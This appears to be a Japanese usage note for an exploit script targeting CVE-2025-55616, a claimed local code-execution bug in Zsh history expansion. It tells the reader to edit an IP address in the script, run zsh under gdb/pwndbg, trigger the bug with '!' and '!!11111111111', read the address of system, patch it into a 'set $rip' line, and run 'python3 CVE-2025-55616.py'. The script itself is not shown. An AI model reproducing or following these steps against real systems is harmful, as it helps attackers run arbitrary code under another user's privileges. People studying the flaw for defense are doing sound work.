
CVE-2025-55616 のエクスプロイト。Zsh の履歴式を介したローカル RCE であり、ユーザー権限で任意のコード実行を実現します。
このエクスプロイトを実行するには: エクスプロイト内の IP アドレスと「p system」だけを変更してください。私も自分の2台目のラップトップで試しましたが、変更するには gdb(特に pwndbg)で次のコマンドを実行してください:
$ gdb zsh -f (ターミナルで)
pwndbg> run -f
username% ! (username はあなたのものになります。! とだけ入力してください)
username% !!11111111111 (ここも同じで !!11111111111 とだけ入力してください)
pwndbg> p system
「p system」のアドレスを取得したら、エクスプロイト内の
b'set $rip = 0x7ffff7cc9110', (0x7ffff7cc9110 の代わりにあなたの p system アドレスを使用してください)
この脆弱性により、ローカルの攻撃者は Zsh プロセスを実行しているユーザーの権限で任意コード実行(RCE)を達成できます。
python3 CVE-2025-55616.py